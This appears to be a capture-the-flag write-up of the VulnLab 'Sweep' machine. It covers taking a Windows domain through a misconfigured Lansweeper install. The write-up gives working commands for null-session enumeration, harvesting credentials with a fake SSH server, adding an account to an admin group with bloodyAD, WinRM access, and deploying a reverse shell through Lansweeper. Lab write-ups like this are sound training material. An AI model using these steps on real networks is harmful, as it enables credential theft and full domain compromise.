VL-Sweep

Vulnlab Sweep: Exploiting Lansweeper for Full Domain Compromise

In this detailed VulnLab walkthrough of the “Sweep” machine, we demonstrate how misconfigured IT asset management tools can lead to complete domain compromise. Beginning with a null session authentication vulnerability that provides initial access, we progressively escalate privileges by intercepting scanning credentials from Lansweeper - a popular network inventory solution. The challenge showcases advanced Active Directory exploitation techniques including credential harvesting, group membership manipulation, and leveraging software deployment features to gain administrator access. This step-by-step guide highlights the security risks associated with misconfigured enterprise network management tools and demonstrates practical techniques for lateral movement in Windows domain environments.

Initial Reconnaissance

First, I conducted a port scan to identify open services on the target:

PORT      STATE SERVICE           REASON          VERSION
53/tcp    open  domain            syn-ack ttl 127 Simple DNS Plus
81/tcp    open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 
82/tcp    open  ssl/http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp    open  kerberos-sec      syn-ack ttl 127 Microsoft Windows Kerberos 
135/tcp   open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn       syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap              syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?     syn-ack ttl 127
464/tcp   open  kpasswd5?         syn-ack ttl 127
636/tcp   open  ldapssl?          syn-ack ttl 127
3268/tcp  open  ldap              syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl? syn-ack ttl 127
3389/tcp  open  ms-wbt-server     syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: SWEEP
|   NetBIOS_Domain_Name: SWEEP
|   NetBIOS_Computer_Name: INVENTORY
|   DNS_Domain_Name: sweep.vl
|   DNS_Computer_Name: inventory.sweep.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-04-10T22:49:54+00:00
5357/tcp  open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 
5985/tcp  open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 
9389/tcp  open  mc-nmf            syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open  ncacn_http        syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
49682/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
49718/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC

I discovered that Lansweeper was running on port 81:

Initial Access

During enumeration, I discovered that the target was vulnerable to null session authentication:

netexec smb 10.10.124.231 -u 'panos' -p '' --shares --users

I used lookupsid to enumerate valid usernames from the domain:

impacket-lookupsid sweeper.vl/panos:''@sweeper.vl -target 10.10.124.231 -no-pass 

The ‘intern’ account looked suspicious. I tried using the credentials ‘intern:intern’ on the Lansweeper login page and gained access:

Privilege Escalation - User

With access to the ‘intern’ account, I enumerated SMB shares:

netexec smb 10.10.124.231 -u 'intern' -p 'intern' --shares

I examined the Lansweeper share but didn’t find anything immediately useful:

smbclient //10.10.124.231/Lansweeper$ -U intern

Next, I used BloodHound to map the Active Directory environment:

netexec ldap 10.10.124.231 -u 'intern' -p 'intern' --bloodhound --dns-server 10.10.124.231 -c ALL --dns-tcp

Two accounts stood out as particularly interesting: svc_inventory_lnx and jgre808.

Exploiting Lansweeper

After logging in with intern:intern credentials, I explored the Lansweeper dashboard. I noticed that the account for Linux scanning had valid credentials, so I created a plan to intercept these credentials.
First, I created a scanning target pointing to my attack machine:

Then I set up a new mapping credential that would cause the Linux scan service account to connect to my machine:

I also ensured my machine was marked as a Linux asset in the system:

Using fakessh tool, I captured the username and password of the scanning service account when it attempted to connect to my machine:

fakessh ./

Lateral Movement

Now with the svc_inventory_lnx credentials, I discovered this account had “GenericAll” privileges over the “LANSWEEPER ADMINS” group. I added the service account to this privileged group:

bloodyAD --host sweep.vl -u 'svc_inventory_lnx' -p '<PASS>' -d 'sweep.vl' add groupMember 'LANSWEEPER ADMINS' svc_inventory_lnx

With elevated privileges, I connected to the target using WinRM:

evil-winrm -i sweep.vl -u svc_inventory_lnx -p '<PASS>'

I was then able to access the user flag:

C:\> type user.txt

Privilege Escalation - Administrator

For the final privilege escalation, I logged into the Lansweeper application with the svc_inventory_lnx account, which now had administrative access.
I created another mapping credential targeting a Windows machine:

Under the Deployment section, I created a new package that would allow me to execute commands on the target machine:

For the payload, I used a PowerShell reverse shell from revshells.com (PowerShell #2 option):

After clicking “Deploy Now” and selecting the appropriate asset:

I received a reverse shell with administrator privileges, completing the compromise:

Share URL: https://api.vulnlab.com/api/v1/share?id=09c407ea-4484-4143-9d7b-866afabd26b4